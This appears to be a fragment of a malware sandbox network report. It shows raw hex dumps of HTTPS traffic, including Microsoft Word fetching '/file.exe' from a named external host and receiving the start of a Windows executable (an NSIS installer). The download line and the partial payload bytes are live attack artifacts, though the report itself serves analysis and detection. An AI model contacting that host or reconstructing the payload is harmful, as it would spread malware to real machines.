                                                          Data Ascii: ?c/gZk%%N`Dr OI02,B;S.3O$fYW)Ia/X|R]f&B!e!:f<N7>)=Im }J:pOoo%y)#9)@"6Eu;R:n7JG#@!tZ3.HDwKP: Z
                                                          2023-03-18 04:35:09 UTC528INData Raw: e3 c8 3b 64 0b 45 59 1c f9 87 94 90 79 ae c9 1c 35 a3 b2 79 ae 19 1c 75 a3 b2 f9 ae d9 1c 0d a5 b2 f9 ae fb 39 9a 44 d1 bd ae 47 cc 98 51 cd 05 ae 8d 1c 2d a3 b2 05 ae a7 39 7a 82 ca 16 ba 76 71 f4 22 95 2d 74 bd ca d1 11 2a bb cf f5 26 47 5f 50 d9 7d ae 77 39 fa 95 ca ee 77 7d cc 91 76 e7 16 8a be e0 28 fc ce 12 b2 c8 75 c1 4c 03 95 2d 72 5d e1 a8 29 95 3d e0 ba ca 51 4f 2a 7b c0 25 e5 32 94 49 65 0f ba 9c 1c 15 50 d9 83 2e 1f 47 4b ee ac 17 f9 90 2b 8a a3 4d 77 36 a2 a8 06 47 2f 52 77 8b 5d 89 1c bd 4f dd 2d 76 a5 72 f4 1d 95 2d 71 b5 e0 48 1a ba 85 a2 f6 1c 55 1a 5a 42 96 ba ba 73 14 4f 65 4b 5d fd 39 6a 49 65 cb 5c 43 39 ea 43 65 cb 5c 63 38 ca 1a 7a 55 5a ee ca e1 68 fa d0 eb 14 4d e3 68 21 75 b7 c2 55 c4 d1 63 d4 dd 0a d7 0a 8e 9e a3 b2 95 ae 47 39
                                                          Data Ascii: ;dEYy5yu9DGQ-9zvq"-t*&G_P}w9w}v(uL-r])=QO*{%2IeP.GK+Mw6G/Rw]O-vr-qHUZBsOeK]9jIe\C9Ce\c8zUZhMh!uUcG9
                                                          2023-03-18 04:35:09 UTC544INData Raw: a8 e2 dc 01 f0 78 26 80 6a 9f 32 0a b1 8b 98 24 88 8b 5f 46 0f 17 e5 f7 f7 40 a5 38 ba 2f 90 30 3b f1 e4 61 a4 06 33 53 15 aa 27 3d a5 cd 89 07 b9 64 c4 ea 8c d0 60 d9 5d c8 9a 38 4c 13 2e ea 2f ba aa 3b 97 1d 2f 6c 95 47 bf 3c f6 60 a4 62 b8 4b fd 2a 99 12 23 18 4f dc 5b c4 52 86 20 21 8a e5 0a 23 17 ec 64 11 81 be 66 29 24 cd 49 1c 90 9a 2e 4e a2 ed 91 61 a6 0c 11 29 d1 f7 a4 72 93 19 33 42 f6 76 b1 e8 db 2b 90 0a ac 86 84 24 0f ae fa 90 10 3c b7 91 a7 9b 30 78 d1 8e 8a 9e 68 86 ed 99 c2 24 9a 04 0d 29 ed bf 09 02 62 a4 98 2a a7 b7 67 2a a9 b1 6c 2e b3 35 93 2b 21 cf 40 f0 8d 93 d9 1c ca 16 1a b4 17 14 8b f9 10 41 3a ab 07 c2 24 4c e9 2f 17 c7 cb 19 d7 35 54 ee 2b 1a d6 21 42 a8 ba 90 7a 6e b1 1c 22 a1 32 db 8b 93 6e 95 80 c7 a8 0d 17 4a 57 b9 77 6a 34
                                                          Data Ascii: x&j2$_F@8/0;a3S'=d`]8L./;/lG<`bK*#O[R !#df)$I.Na)r3Bv+$<0xh$)b*g*l.5+!@A:$L/5T+!Bzn"2nJWwj4
                                                          2023-03-18 04:35:09 UTC560INData Raw: 55 61 12 b5 61 12 10 5d 31 92 73 18 1f f4 48 d0 38 81 51 8b 72 53 d1 95 2d 48 22 a6 2c c1 38 0c 3f e2 f2 30 be 33 37 01 d3 c1 66 6e 22 b9 46 d6 71 b3 16 5b 73 a4 af 03 c6 e4 d1 4c 12 9e 5c cb c5 c5 41 4a ec 57 92 20 25 09 52 92 20 a5 e6 28 44 ee 95 b1 a1 df 3f ff 0f 47 15 de 6f b1 90 9f 21 5e 69 6f 9b b9 4d 3f df 4f d3 17 ab d8 77 91 30 78 94 9c 3f 24 e7 47 08 dc 4d ce 27 48 36 7c 92 c0 7d 04 1e 80 02 de 43 f4 1b 48 27 3f 28 83 e2 41 5a 93 98 3b 48 53 d7 dc 3d 14 f3 8b 04 be 4a e0 1b 04 be 4d e0 11 8a f0 26 29 f7 9b 08 17 d9 37 77 2d e1 6f 15 fc ad 84 df 20 38 65 30 f3 98 64 f0 18 d1 6f 14 3a 1b 03 37 0b 7e 33 e1 b7 0a 4e 2b d8 73 77 08 7e 07 c5 7d 5c e2 3e 4e f4 3b 85 7e a7 ae f7 93 22 e5 1e d0 ce 9f c5 68 ed b6 3d 41 06 0c 91 f1 c7 cb 1d 33 cf 26 48 0d
                                                          Data Ascii: Uaa]1sH8QrS-H",8?037fn"Fq[sL\AJW %R (D?Go!^ioM?Ow0x?$GM'H6|}CH'?(AZ;HS=JM&)7w-o 8e0do:7~3N+sw~}\>N;~"h=A3&H
                                                          2023-03-18 04:35:09 UTC576INData Raw: f8 f1 a6 6c 17 f1 e0 19 7f 8e da 5a d3 e5 40 7e 4a bd 3f ee 40 c6 45 4d 9d a0 d7 e8 f4 53 f3 72 74 e9 33 35 a9 b9 39 f9 53 e3 0b 32 8c 79 9a 7c 83 7e aa 79 c5 aa cb 2f 97 ff b2 76 f9 a5 4f 76 4e 9d 98 a3 37 a6 e7 ca c7 1b 8c 99 39 05 f2 30 45 e8 93 53 b5 ba 82 59 9a 0c 20 64 2e 35 7a d4 53 8b fa 47 4c 1d a7 c9 d5 a4 eb 35 42 7c 88 36 93 d9 9f ae ec c1 76 c4 ef e8 19 11 97 ac c2 5b 68 f2 24 f6 9b 0c 01 79 44 7a f9 34 da 0f 3c 2e 40 a1 e0 d2 00 37 46 cc e3 8a ac bf f1 10 92 83 bf a9 10 f0 24 b3 0f 1c 7e 6b 5c 88 42 91 91 05 4e fd f9 19 f4 27 16 42 e2 c6 25 07 a4 c4 c5 12 5d b3 c5 4d 21 eb 2e 1b 5c 22 a1 bb 67 8b 23 74 30 29 0a 70 6a 42 e7 6c 8b 23 74 9e 36 b8 64 42 e7 63 8b 23 74 72 c0 9d 77 01 1c fb 9d 09 1c 8b b7 44 7c 3c 00 2f 90 10 fb ed e5 60 c5 cd 9f
                                                          Data Ascii: lZ@~J?@EMSrt359S2y|~y/vOvN790ESY d.5zSGL5B|6v[h$yDz4<.@7F$~k\BN'B%]M!.\"g#t0)pjBl#t6dBc#trwD|</`
                                                          2023-03-18 04:35:09 UTC592INData Raw: 81 18 52 cf 1f 69 6b 16 c6 00 9e 47 26 8a 27 f0 39 ca 3c bd 52 51 12 e2 67 c7 42 8c e5 be ab 25 ff 63 de 17 39 ff 0d f8 f2 10 fc f5 57 33 ff 63 b7 af 79 f4 14 b7 e4 02 83 09 26 5d 7d 36 13 0c d7 8f 47 73 91 9b 81 c0 c4 b8 eb 4d c9 d7 25 ee 6a 36 3a f0 5e 2e c2 a5 4f 48 44 ef e6 1b e1 51 74 3a 66 76 66 69 9a e9 f8 1c 45 90 82 b6 6c c2 ce 49 9a a7 f4 3a 5c 63 da 6b fa d0 4b 2c fe f2 e3 72 37 7f 9d a8 48 6b 35 7f 76 da a1 fa 77 b0 ff c3 f5 79 40 d8 85 db 19 b5 6e 18 c5 ad e2 1d a4 05 fd a2 90 f6 5b 31 a9 44 bc 7c c6 68 c3 6b 54 32 35 00 a5 e3 58 9c 31 05 69 68 e7 3f 6a 36 e4 50 2a 71 f9 16 a5 84 f7 ff 6d ab 34 58 29 0d 37 53 d1 31 53 aa 60 1b 0d d3 58 13 59 d4 6b dd 83 34 cf 0d 16 f7 f5 30 61 6a dc 34 61 2e 79 dc 50 72 4e 4f 83 5a bb f5 33 14 24 2c d0 f0 f7
                                                          Data Ascii: RikG&'9<RQgB%c9W3cy&]}6GsM%j6:^.OHDQt:fvfiElI:\ckK,r7Hk5vwy@n[1D|hkT25X1ih?j6P*qm4X)7S1S`XYk40aj4a.yPrNOZ3$,
                                                          2023-03-18 04:35:09 UTC608INData Raw: 17 a3 ab fe 58 ce 5d 95 27 1d 41 43 fe 3d 7e 21 98 f3 51 7f f1 f7 c0 20 ec 59 fc ef 18 cc 8e 77 ba a0 dd b7 93 3d 09 ff c1 2d 3d 7b aa 39 7f 6f 33 c4 8d 6f 34 e0 dc 7c e0 52 f3 2a c1 92 c5 f2 8a a5 ee d2 04 d3 e6 98 3a 76 68 12 de 38 7a 37 15 d7 b7 8c 63 c3 18 df a3 f0 7b 32 7e b7 1b df a5 5c 12 61 a2 3c a7 7c 5f 71 3e 9e 2f 5f ce 6b ea 75 0f 9d 5b be ec 7d 0e f9 fe a9 0f fe 46 be 9c f9 01 c9 97 fb 9f 43 f9 f2 db e7 5a c8 97 8f 7f c0 f2 e5 e7 ff 30 d9 ea e4 0f f8 be 24 8b 29 5f ce b6 d2 9b eb 63 c2 e5 cb 0c 6b b8 7c f9 3e 05 26 fa 2b f9 72 ec 73 2c 5f 1e 5d de 8a 7c 19 76 3f 1b 0c 07 10 f9 79 22 ed 03 be f0 25 91 d7 57 79 80 fb 3c 71 a1 7c 2f d9 7e 5c bb e7 0c 6e bf 62 79 6b dc 7e 6e c4 7a 89 e7 d9 c4 8e e5 16 79 e3 db a6 e5 54 c6 a7 cf 1a 65 3c d8 6a 19
                                                          Data Ascii: X]'AC=~!Q Yw=-={9o3o4|R*:vh8z7c{2~\a<|_q>/_ku[}FCZ0$)_ck|>&+rs,_]|v?y"%Wy<q|/~\nbyk~nzyTe<j
                                                          2023-03-18 04:35:09 UTC624INData Raw: 3b 57 c6 66 f5 c9 f9 0a 2d 6e d7 67 17 9e 98 71 2f d4 71 22 2d e8 d0 f7 0f f3 45 a7 b9 32 f6 66 aa 2f 56 a5 6c 80 1f 2e 75 e8 b1 91 be 81 69 58 4b 61 3d b1 f7 33 ea 93 c3 68 e7 01 8a df 20 7e 1f 42 2b b4 4b 39 ea cc d8 f4 e8 52 9c 41 7d 79 dd bf 0c 08 26 b0 ea 74 18 bf f6 0d 99 ab 1f 4b 0b 62 2c 5f 05 0a df 8f b5 4c 8f 43 4d 38 a5 1a a3 95 cd 02 11 03 e3 54 e4 f8 a2 3b 49 44 d7 a9 4f fe 60 a1 43 01 9a 6f cc bc 68 4f 73 94 3b dd 2c cf 3b 94 2e d3 d0 ed a7 b5 8c 0d 05 47 42 59 de 23 44 f7 a9 9e 7f 50 e4 b7 aa 80 82 f2 16 94 90 19 05 35 87 e4 b7 cf 30 7f d4 24 dd 7e 46 7a 1b 04 b1 a0 df f0 84 bd c3 6c 61 5c 78 0b d5 f9 18 63 88 3a e1 03 18 e4 b9 b3 6c 0f 83 9a f1 3a 8a 13 4a d0 d0 97 41 ff 7b 9d f5 f1 e5 bc ca 83 e4 14 b7 1e 56 70 71 49 aa 94 61 03 a2 31 34
                                                          Data Ascii: ;Wf-ngq/q"-E2f/Vl.uiXKa=3h ~B+K9RA}y&tKb,_LCM8T;IDO`CohOs;,;.GBY#DP50$~Fzla\xc:l:JA{VpqIa14
                                                          2023-03-18 04:35:09 UTC640INData Raw: 97 2a b3 1a 97 5c 36 f9 ee 2f 1c 57 3b 6b c6 dd d1 6b df f2 bb 1c 1f 8e eb ed dc f0 8c f5 f3 7d 19 9b 23 fb dd f3 fa e1 de eb 2f 7a 66 7b ee e7 ab 2e 1f f7 d4 c0 1e e9 53 cb 12 2e 9c 7f fd b7 8f b5 7e f6 c2 8c b5 99 bf bc 7f c9 a3 6d df 38 f1 ef 7f fd 50 b8 cd 92 fc d0 e2 bc d2 aa d8 b7 ee 39 af f8 97 fc 97 9e ae 8f 5d fd 23 ab f9 c7 a5 ff 5a 1a ad d3 37 1c 6a b8 75 49 75 7d ec ba cf a2 d9 98 c4 cb dc ad 74 e6 b1 3a 7d dc ed 31 b7 0c 5e 33 72 fc 33 d5 fd 67 98 36 d7 15 c5 e8 cc db e8 f4 95 27 87 66 f7 fe f4 ad d8 97 f6 46 b3 7e 9f b4 e8 5a 78 e6 60 df c4 bd 87 63 6b e7 ab e6 6d 75 f2 ed 75 fa 76 3a fd 27 83 6e 18 7e 5f e6 13 49 77 f6 da 76 c3 19 e7 ac b2 0e af 7e 5a bd fa f9 23 57 3f df d0 7e e0 dd df bf 5a bc ab 83 e3 e5 c5 f1 ce ab 57 7c 17 bd f0 cf fe
                                                          Data Ascii: *\6/W;kk}#/zf{.S.~m8P9]#Z7juIu}t:}1^3r3g6'fF~Zx`ckmuuv:'n~_Iwv~Z#W?~ZW|
                                                          2023-03-18 04:35:09 UTC656INData Raw: 2d ef be 3f 10 bd e2 bc 16 c3 29 d0 f4 44 e9 c3 88 57 29 55 7b 7b 48 3b 55 39 96 59 a4 b2 1f b1 a2 31 87 8a d5 06 54 c1 0c 87 c9 b0 94 4f b7 4e 1e 4b 7a d2 6c c7 ce 72 b9 de b6 2c c6 71 53 9d 97 b9 56 c6 3f 37 d9 95 d4 87 05 48 fc 10 5b 25 98 b0 e4 9b a1 73 94 80 3c f6 ec b4 f9 6b b1 62 9b 40 f9 f5 6a a8 ce 6d b8 61 82 dd 76 9e 89 a3 bb 61 e6 01 d7 3d 5c b7 e5 98 66 97 04 b3 4d 7f 5c ec 34 18 e7 00 20 2f 10 77 38 83 c4 52 dc ca 4a ea f9 4d ae ae 80 59 d3 81 11 29 c9 ff 49 ac ed 58 15 ee b4 b8 0e 64 28 be ef 51 f4 82 f6 43 c5 6d 1e 4f bc e2 3a a8 7c a1 73 62 51 56 6f 43 c9 77 6d c0 ab 00 6b b8 2b 80 f5 8a ac 26 0e d2 d1 b0 92 74 00 de 3a 24 12 c1 eb cd 80 2d 36 5f f2 55 ac 61 b8 36 53 9a 6c 6d 71 95 4c 93 e9 8c f0 09 ee 6c 1a f9 32 78 5e e1 53 08 8d 86 74
                                                          Data Ascii: -?)DW)U{{H;U9Y1TONKzlr,qSV?7H[%s<kb@jmava=\fM\4 /w8RJMY)IXd(QCmO:|sbQVoCwmk+&t:$-6_Ua6SlmqLl2x^St


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          1192.168.2.2249172149.102.154.62443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          TimestampkBytes transferredDirectionData
                                                          2023-03-18 04:35:11 UTC661OUTGET /file.exe HTTP/1.1
                                                          Host: thekaribacruisecompany.com
                                                          Connection: Keep-Alive
                                                          2023-03-18 04:35:11 UTC661INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sat, 18 Mar 2023 04:35:11 GMT
                                                          Content-Type: application/x-msdownload
                                                          Content-Length: 676320
                                                          Connection: close
                                                          Last-Modified: Fri, 17 Mar 2023 04:56:55 GMT
                                                          Accept-Ranges: bytes
                                                          2023-03-18 04:35:11 UTC661INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 29 81 e9 50 47 d2 e9 50 47 d2 e9 50 47 d2 2a 5f 18 d2 eb 50 47 d2 e9 50 46 d2 49 50 47 d2 2a 5f 1a d2 e6 50 47 d2 bd 73 77 d2 e3 50 47 d2 2e 56 41 d2 e8 50 47 d2 52 69 63 68 e9 50 47 d2 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 8b 9d 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 66 00 00 00 ac 04 00 00 20 00 00 b3 33 00 00 00 10 00 00 00 80 00 00 00 00 40
                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1)PGPGPG*_PGPFIPG*_PGswPG.VAPGRichPGPELOaf 3@
                                                          2023-03-18 04:35:11 UTC677INData Raw: 40 8b 45 14 53 56 8b 75 10 57 6a dc 85 c0 5b 74 0b 0f ac c6 14 c1 e8 14 33 ff eb 4e 6a 14 81 fe 00 00 10 00 59 8b c6 73 06 6a 0a 59 6a dd 5b 81 fe 00 04 00 00 73 05 6a de 33 c9 5b 81 fe 33 33 ff ff 73 0d 33 c0 6a 14 40 5f d3 e0 99 f7 ff 03 c6 8b f0 25 ff ff ff 00 6a 0a 33 d2 8d 04 80 03 c0 d3 e8 d3 ee 59 f7 f1 8b fa 8d 45 e0 6a df 50 e8 53 17 00 00 50 8d 45 c0 53 50 e8 48 17 00 00 50 57 56 68 08 a2 40 00 ff 75 0c be 90 c0 43 00 56 e8 32 17 00 00 56 8b f8 e8 ad 16 00 00 03 f8 57 ff 15 34 82 40 00 83 c4 18 56 ff 75 08 ff 35 f8 e3 44 00 e8 70 0d 00 00 5f 5e 5b c9 c2 10 00 8b 44 24 0c 33 c9 51 50 ff 74 24 10 ff 74 24 10 e8 26 ff ff ff c2 0c 00 8b 15 4c 24 45 00 8b 0d 48 24 45 00 33 c0 85 d2 74 18 56 f6 41 08 01 74 07 8b 74 24 08 03 04 b1 81 c1 18 20 00 00 4a
                                                          Data Ascii: @ESVuWj[t3NjYsjYj[sj3[33s3j@_%j3YEjPSPESPHPWVh@uCV2VW4@Vu5Dp_^[D$3QPt$t$&L$EH$E3tVAtt$ J
                                                          2023-03-18 04:35:12 UTC693INData Raw: 2e 20 25 64 25 25 00 00 00 00 53 65 53 68 75 74 64 6f 77 6e 50 72 69 76 69 6c 65 67 65 00 41 00 00 00 2e 74 6d 70 00 00 00 00 41 00 00 00 7e 6e 73 75 00 00 00 00 20 5f 3f 3d 00 00 00 00 54 4d 50 00 54 45 4d 50 00 00 00 00 4c 6f 77 00 5c 54 65 6d 70 00 00 00 20 2f 44 3d 00 00 00 00 4e 43 52 43 00 00 00 00 4e 53 49 53 20 45 72 72 6f 72 00 00 00 00 00 00 45 72 72 6f 72 20 77 72 69 74 69 6e 67 20 74 65 6d 70 6f 72 61 72 79 20 66 69 6c 65 2e 20 4d 61 6b 65 20 73 75 72 65 20 79 6f 75 72 20 74 65 6d 70 20 66 6f 6c 64 65 72 20 69 73 20 76 61 6c 69 64 2e 00 00 ff ff ff ff 3f 44 40 00 d9 4c 40 00 66 47 40 00 b6 54 40 00 1f 47 40 00 5f 4e 62 00 2e 65 78 65 00 00 00 00 6f 70 65 6e 00 00 00 00 25 75 2e 25 75 25 73 25 73 00 00 00 00 00 00 00 28 00 00 00 00 00 00 00 00
                                                          Data Ascii: . %d%%SeShutdownPrivilegeA.tmpA~nsu _?=TMPTEMPLow\Temp /D=NCRCNSIS ErrorError writing temporary file. Make sure your temp folder is valid.?D@L@fG@T@G@_Nb.exeopen%u.%u%s%s(
                                                          2023-03-18 04:35:12 UTC709INData Raw: 43 ff d8 09 09 ff e8 09 09 ff c6 0c 20 20 ba 0d 0d ff 58 00 00 ff 26 2b 2b ff ef f0 f0 20 f7 f7 f7 ff 46 47 47 ff 02 00 00 ff 42 41 41 ff ec ed ed ff f8 f8 f8 ff 35 36 36 ff 39 3b 3b ff 1c 1d 1d ff 1f 00 00 ff 97 22 22 ff b6 5e 5e ff 4c 4b 20 ff 00 00 00 ff 51 50 50 ff ec ed ed ff d8 d9 d9 ff c8 c7 c7 ff b5 ba ba ff a5 ae 20 ff 9b 9d 9d ff 8f 8e 8e 20 82 82 82 ff 76 76 76 ff 6e 6e 6e ff 69 69 69 ff 20 66 66 ff 6d 6d 6d ff 74 74 74 ff 7d 7d 7d ff 79 79 79 ff 4a 4a 4a ff 1a 1a 1a f7 00 00 00 a9 00 00 00 a1 00 00 00 88 00 00 00 60 00 00 00 39 00 00 00 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 3c e8 e8 e8 20 c2 c2 c2 ff b2 b2 b2 ff b5 b5 b5 ff b9 20 b9 ff bc bc bc ff c9 c9 c9 ff 7e 84 84 ff 61 66 66 ff c5
                                                          Data Ascii: C X&++ FGGBAA5669;;""^^LK QPP vvvnnniii ffmmmttt}}}yyyJJJ`9< ~aff
                                                          2023-03-18 04:35:12 UTC725INData Raw: 00 3a 00 00 00 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f7 f7 f7 1e ef ef ef d5 cd cd cd ff ba ba ba ff bc bc bc ff c1 c1 c1 ff c5 c5 c5 ff c9 c9 c9 ff cd cc cc ff d4 d2 d2 ff db e3 e3 ff e0 e9 e9 ff fa 7d 7d ff eb 14 14 ff 5b 1f 1f ff 78 88 88 ff e7 e8 e8 ff e5 e5 e5 ff ab ab ab ff 6b 6b 6b ff 2a 2a 2a ff 0a 09 09 20 2c 33 33 ff 5a 52 52 ff aa 46 46 ff bd 3b 3b ff a3 2f 2f ff 61 15 15 ff 29 23 23 ff d7 dc dc ff a0 a0 a0 ff 00 00 00 ff 53 53 53 ff f6 f6 f6 ff fa fa fa ff 64 66 66 ff 00 00 00 ff 31 12 12 ff 46 2f 2f ff 49 47 47 ff 8a 91 91 ff 78 85 85 ff 3b 25 25 ff da 78 78 ff ff 93 93 20 f6 b8 b8 ff e7 ec ec ff e5 e6 e6 ff e3 e3 e3 ff e2 e2 e2 ff e3 e3 e3 ff c9 c9 c9 ff 6f 6f 6f ff 14 14 14 dc 00 00 00 a2 00 00 00 92 00 00 00 66 00
                                                          Data Ascii: :}}[xkkk*** ,33ZRRFF;;//a)##SSSdff1F//IGGx;%%xx ooof
                                                          2023-03-18 04:35:12 UTC741INData Raw: 92 ff c5 96 96 ff ff dc dc ff ff dd dd ff ff d7 d7 ff b7 86 86 d8 23 15 15 5a 20 00 00 0c 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 5d 5d bf 5f 5f 5f ff 11 11 11 ff 01 01 01 ff 20 20 20 fb b2 b2 b2 eb e8 e8 e8 df dc dc dc d6 e2 e2 e2 d0 e4 e4 e4 ce e3 e3 e3 cf e0 e0 e0 d3 dd dd dd d9 da da da e2 d6 d6 d6 eb d1 d1 d1 f8 cd cd cd fe c9 c9 c9 ff c6 c6 c6 ff c3 c3 c3 ff bf bf bf ff be be be ff be be be ff bf be be ff c3 c2 c2 ff c6 c6 c6 ff ca c9 c9 ff ce cc 20 20 d0 cf cf 20 d2 d2 d2 ff d7 d7 d7 ff c4 c8 c8 ff 9e 92 92 ff c8 9d 9d ff ff e4 e4 ff ff dd dd ff b2 86 86 cd 1c 11 11 44 00 00 00 20 00 00 00 00 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c
                                                          Data Ascii: #Z ]]___ D l
                                                          2023-03-18 04:35:12 UTC757INData Raw: 00 00 00 20 00 00 00 03 00 00 00 07 00 00 01 00 ff ff 00 00 00 00 00 00 00 00 48 08 ca 80 07 00 00 00 00 00 60 01 a2 00 00 00 00 00 00 00 08 00 00 00 00 01 4d 00 53 00 20 00 53 00 68 00 65 00 6c 00 6c 00 20 00 44 00 6c 00 67 00 00 00 00 00 00 00 00 00 00 00 00 00 03 40 f3 00 8e 00 32 00 0e 00 03 00 00 00 ff ff 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 50 27 01 8e 00 32 00 0e 00 01 00 00 00 ff ff 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 50 4f 00 8e 00 32 00 0e 00 02 00 00 00 ff ff 80 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 02 50 4f 00 8a 00 0b 01 01 00 ff ff 00 00 ff ff 82 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 02 40 4f 00 06 00 0a 01 82 00 fa 03 00 00 ff ff 82 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 02 58 83 00 91 00 6c
                                                          Data Ascii: H`MS Shell Dlg@2P'2PO2PO@OXl
                                                          2023-03-18 04:35:12 UTC773INData Raw: 4a 77 c3 28 29 2c 39 f0 58 66 36 ae ec 72 cc 72 56 13 97 47 1a eb fc 2d 7f 82 c7 d7 de c8 ea d2 9f 8b 5a ec 09 9f 46 d3 5c 4d d1 2c c7 87 6a 7d c4 b0 68 72 4f 36 86 55 2a 44 72 5f 7a 91 0a b9 c4 65 11 0f 86 20 d7 99 b6 2e fd 52 ba 07 2f 99 b6 64 6c f6 b6 2d cf aa 6e 0a 99 1f 37 76 81 3c ae 80 ec fa 56 03 ca 71 bd 31 a3 2a 68 53 74 9c db c3 e5 8a 8e 9b 99 c7 37 d3 30 cd f2 dd bb 60 92 fb 29 ce 9a c8 c3 4d 9c 2e dd 94 9f bb 73 26 6e 50 fe 2d 39 2e 59 d3 2c dd 3d a5 08 5e ea f9 12 91 59 8b 33 46 6c 8a 61 70 6b 9a 19 3c 72 12 35 1f 59 60 04 ee 2a ef b1 4c ac fe d0 47 af df f3 e3 e7 96 98 d0 c4 87 f7 ad b5 c2 93 66 b9 4d 6a b2 47 ee 4f fe 04 9b 67 83 ba b9 ed b0 1d c6 06 f3 4c 50 2f 16 c3 2a f3 3e 2a c3 a9 f0 56 26 90 49 16 3b 6f 6b a3 f3 e8 7a c0 04 90 75 e4
                                                          Data Ascii: Jw(),9Xf6rrVG-ZF\M,j}hrO6U*Dr_ze .R/dl-n7v<Vq1*hSt70`)M.s&nP-9.Y,=^Y3Flapk<r5Y`*LGfMjGOgLP/*>*V&I;okzu
                                                          2023-03-18 04:35:12 UTC789INData Raw: ef 7b e0 35 fe 2b 27 b7 40 9a 02 43 83 c5 3f b9 ff b0 ae d6 b0 b9 36 a3 5d b7 4a 56 c3 9b 73 68 1f 35 b6 12 9e 22 d7 5c ca 71 4f e3 1c 8a 7f b6 af a9 7b ab 8f aa 90 fb 2f 6d 17 6d 9b 97 a0 ad 4c d1 9f 74 42 ec 2a a6 ba 9f 7a ce 62 d9 7f 2a cd c8 2c bb fe a8 de 21 3a a8 ef d9 a9 53 f7 be 44 f9 db d7 31 bd 6a e6 25 d6 c8 df 16 1a 07 45 0c 4d c0 cd 9f 14 fa 4c 41 fa 1a 13 f3 40 ea ba d7 c0 f5 46 9e 5f c7 6f d5 e9 3a 27 b3 b6 d4 cf 8e ee 12 bb 3f 67 b8 85 b8 29 ba 13 a6 06 a2 77 64 b3 1c 5f 28 e2 f1 7d 94 1a b2 37 b7 4e b0 6c 5a a5 74 be 2f 11 e1 49 28 7c 94 f3 19 14 0c b3 0f 8c 84 1b 47 5f 1b 9f d9 b7 f9 9f 3d ee fe 3f 50 45 0a 62 d8 f3 05 62 81 14 b0 1e 40 fa 8d 17 75 8b 10 4b cb dd eb 27 80 17 a6 5d ad f5 d4 be c8 76 bc cb fa e3 1f 5f 23 0e 4a fd a0 3f bc
                                                          Data Ascii: {5+'@C?6]JVsh5"\qO{/mmLtB*zb*,!:SD1j%EMLA@F_o:'?g)wd_(}7NlZt/I(|G_=?PEbb@uK']v_#J?
                                                          2023-03-18 04:35:12 UTC805INData Raw: 4f af 85 88 4b 75 c7 0a 45 70 ae f7 38 24 44 fc cc 58 b9 4c f9 1b e8 fc 76 b8 e1 9b ac dd 0b 8e a6 17 35 de c8 00 99 2a f8 be 46 48 48 2d 3b 4c 0e c8 b4 9d 98 6c fe 8b fb 31 64 ed 04 cb 9c 3f 7d 31 a7 86 2e ed d8 fa 92 e1 31 93 d2 f7 18 8d cd b2 6e fa 35 ad 02 c0 9e 1f 0a 37 39 83 4e 3d dc 3f 00 ca a6 79 ca d9 c1 75 51 53 64 27 50 f5 e1 86 9d 2a 5d de 69 42 ea c3 70 da 0b 04 9f 59 8a 8f 4d c5 25 e4 e0 06 49 33 2f e0 a1 aa 2f e5 3c a0 da 47 a9 da ab 70 7d 6f a5 0a 09 54 bb 73 44 e4 22 5d d9 df ee c8 f8 31 4b 0e 31 fb 9e 76 67 71 86 00 b4 da ed bc 43 e6 67 6e e0 39 44 ee 7c 28 3e 0e 26 3c 2e 04 3d 80 22 ec 71 f1 07 24 78 8d 19 f5 9b c5 b9 65 9c 47 dd af ac e5 c4 84 96 6f 0e fe c0 5a 7f d9 54 aa 50 0c 2f d6 22 f8 8a e8 fc 05 ad 91 f9 5a 78 0e 7f 1b 26 db 69
                                                          Data Ascii: OKuEp8$DXLv5*FHH-;Ll1d?}1.1n579N=?yuQSd'P*]iBpYM%I3//<Gp}oTsD"]1K1vgqCgn9D|(>&<.="q$xeGoZTP/"Zx&i
                                                          2023-03-18 04:35:12 UTC821INData Raw: e0 e3 00 4a 22 10 77 32 c4 f2 11 64 70 2e 49 19 c3 ca 47 35 43 74 ed f1 f1 5f de 63 69 13 46 97 b0 be 42 c2 16 a0 a8 a4 5c ba 62 4f 43 d8 63 93 8a e4 37 33 87 78 33 9f 43 42 4f 13 4f b9 02 b5 e7 bb e9 3c 94 66 62 66 8a 1d 39 79 ee 49 e9 f6 9f ef 91 df f0 fe 84 e8 a3 e2 80 98 a3 d5 91 97 9f 45 1b 43 16 fa a0 c9 cf f8 b6 31 3d 56 ce cc 4d e7 3a 53 b8 49 8e 1b 6b 01 4a 7d 6a 7b f6 03 5e f4 b2 4a 60 27 8e b7 7f 70 f4 50 be 28 1c 76 3c 95 59 3c b5 3a 62 bd 1b 12 69 4e bc e2 ae f8 ee a7 cf f2 fc 98 1a 55 e6 16 a5 fa d9 89 71 67 98 5a 87 5d c4 e7 e0 82 44 79 56 e1 a1 8b f5 47 a7 40 39 7c e7 76 3a ea 4b af f0 e1 fb 53 4f ae dd 60 d7 fd c6 e6 ec c1 f4 4c 72 f1 d3 13 58 75 1c fe 76 e7 e7 b3 c3 dd a0 4c 10 5b f0 65 ce a0 b5 a4 c7 7b 41 2e 8d a9 67 43 70 9d cd a4 f5
